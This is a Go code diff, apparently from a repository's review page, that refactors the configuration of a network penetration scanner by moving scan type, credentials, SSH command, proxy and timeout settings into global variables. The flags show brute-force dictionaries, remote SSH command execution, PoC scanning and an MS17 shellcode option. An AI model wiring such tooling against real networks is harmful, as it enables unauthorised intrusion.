if UrlFile != "" {
|
||||
|
@ -149,7 +150,7 @@ func ParseInput(Info *HostInfo) {
|
|||
|
||||
if UserAdd != "" {
|
||||
user := strings.Split(UserAdd, ",")
|
||||
for a, _ := range Userdict {
|
||||
for a := range Userdict {
|
||||
Userdict[a] = append(Userdict[a], user...)
|
||||
Userdict[a] = RemoveDuplicate(Userdict[a])
|
||||
}
|
||||
|
@ -166,12 +167,12 @@ func ParseInput(Info *HostInfo) {
|
|||
}
|
||||
|
||||
func ParseScantype(Info *HostInfo) {
|
||||
_, ok := PORTList[Info.Scantype]
|
||||
_, ok := PORTList[Scantype]
|
||||
if !ok {
|
||||
showmode()
|
||||
}
|
||||
if Info.Scantype != "all" && Info.Ports == DefaultPorts+","+Webport {
|
||||
switch Info.Scantype {
|
||||
if Scantype != "all" && Info.Ports == DefaultPorts+","+Webport {
|
||||
switch Scantype {
|
||||
case "rdp":
|
||||
Info.Ports = "3389"
|
||||
case "web":
|
||||
|
@ -187,10 +188,10 @@ func ParseScantype(Info *HostInfo) {
|
|||
case "main":
|
||||
Info.Ports = DefaultPorts
|
||||
default:
|
||||
port, _ := PORTList[Info.Scantype]
|
||||
port, _ := PORTList[Scantype]
|
||||
Info.Ports = strconv.Itoa(port)
|
||||
}
|
||||
fmt.Println("-m ", Info.Scantype, " start scan the port:", Info.Ports)
|
||||
fmt.Println("-m ", Scantype, " start scan the port:", Info.Ports)
|
||||
}
|
||||
}
|
||||
|
||||
|
|
|
@ -45,28 +45,15 @@ var Webport = "80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,
|
|||
var DefaultPorts = "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017"
|
||||
|
||||
type HostInfo struct {
|
||||
Host string
|
||||
Ports string
|
||||
Domain string
|
||||
Url string
|
||||
Path string
|
||||
Timeout int64
|
||||
Scantype string
|
||||
Command string
|
||||
SshKey string
|
||||
Username string
|
||||
Password string
|
||||
Usernames []string
|
||||
Passwords []string
|
||||
Infostr []string
|
||||
Hash string
|
||||
Host string
|
||||
Ports string
|
||||
Url string
|
||||
Infostr []string
|
||||
}
|
||||
|
||||
type PocInfo struct {
|
||||
Num int
|
||||
Rate int
|
||||
Timeout int64
|
||||
Proxy string
|
||||
PocName string
|
||||
PocDir string
|
||||
Target string
|
||||
|
@ -79,10 +66,19 @@ type PocInfo struct {
|
|||
}
|
||||
|
||||
var (
|
||||
Path string
|
||||
Scantype string
|
||||
Command string
|
||||
SshKey string
|
||||
Domain string
|
||||
Username string
|
||||
Password string
|
||||
Proxy string
|
||||
Timeout int64
|
||||
WebTimeout int64
|
||||
TmpOutputfile string
|
||||
TmpSave bool
|
||||
IsPing bool
|
||||
IsWmi bool
|
||||
Ping bool
|
||||
Pocinfo PocInfo
|
||||
IsWebCan bool
|
||||
|
|
|
@ -25,14 +25,14 @@ func Flag(Info *HostInfo) {
|
|||
flag.StringVar(&UserAdd, "usera", "", "add a user base DefaultUsers,-usera user")
|
||||
flag.StringVar(&PassAdd, "pwda", "", "add a password base DefaultPasses,-pwda password")
|
||||
flag.StringVar(&NoPorts, "pn", "", "the ports no scan,as: -pn 445")
|
||||
flag.StringVar(&Info.Command, "c", "", "exec command (ssh)")
|
||||
flag.StringVar(&Info.SshKey, "sshkey", "", "sshkey file (id_rsa)")
|
||||
flag.StringVar(&Info.Domain, "domain", "", "smb domain")
|
||||
flag.StringVar(&Info.Username, "user", "", "username")
|
||||
flag.StringVar(&Info.Password, "pwd", "", "password")
|
||||
flag.Int64Var(&Info.Timeout, "time", 3, "Set timeout")
|
||||
flag.StringVar(&Info.Scantype, "m", "all", "Select scan type ,as: -m ssh")
|
||||
flag.StringVar(&Info.Path, "path", "", "fcgi、smb romote file path")
|
||||
flag.StringVar(&Command, "c", "", "exec command (ssh)")
|
||||
flag.StringVar(&SshKey, "sshkey", "", "sshkey file (id_rsa)")
|
||||
flag.StringVar(&Domain, "domain", "", "smb domain")
|
||||
flag.StringVar(&Username, "user", "", "username")
|
||||
flag.StringVar(&Password, "pwd", "", "password")
|
||||
flag.Int64Var(&Timeout, "time", 3, "Set timeout")
|
||||
flag.StringVar(&Scantype, "m", "all", "Select scan type ,as: -m ssh")
|
||||
flag.StringVar(&Path, "path", "", "fcgi、smb romote file path")
|
||||
flag.IntVar(&Threads, "t", 600, "Thread nums")
|
||||
flag.IntVar(&LiveTop, "top", 10, "show live len top")
|
||||
flag.StringVar(&HostFile, "hf", "", "host file, -hf ip.txt")
|
||||
|
@ -55,10 +55,10 @@ func Flag(Info *HostInfo) {
|
|||
flag.StringVar(&URL, "u", "", "url")
|
||||
flag.StringVar(&UrlFile, "uf", "", "urlfile")
|
||||
flag.StringVar(&Pocinfo.PocName, "pocname", "", "use the pocs these contain pocname, -pocname weblogic")
|
||||
flag.StringVar(&Pocinfo.Proxy, "proxy", "", "set poc proxy, -proxy http://127.0.0.1:8080")
|
||||
flag.StringVar(&Proxy, "proxy", "", "set poc proxy, -proxy http://127.0.0.1:8080")
|
||||
flag.StringVar(&Socks5Proxy, "socks5", "", "set socks5 proxy, will be used in tcp connection, timeout setting will not work")
|
||||
flag.StringVar(&Pocinfo.Cookie, "cookie", "", "set poc cookie,-cookie rememberMe=login")
|
||||
flag.Int64Var(&Pocinfo.Timeout, "wt", 5, "Set web timeout")
|
||||
flag.Int64Var(&WebTimeout, "wt", 5, "Set web timeout")
|
||||
flag.IntVar(&Pocinfo.Num, "num", 20, "poc rate")
|
||||
flag.StringVar(&SC, "sc", "", "ms17 shellcode,as -sc add")
|
||||
flag.Parse()
|
||||
|
|
Loading…
Reference in New Issue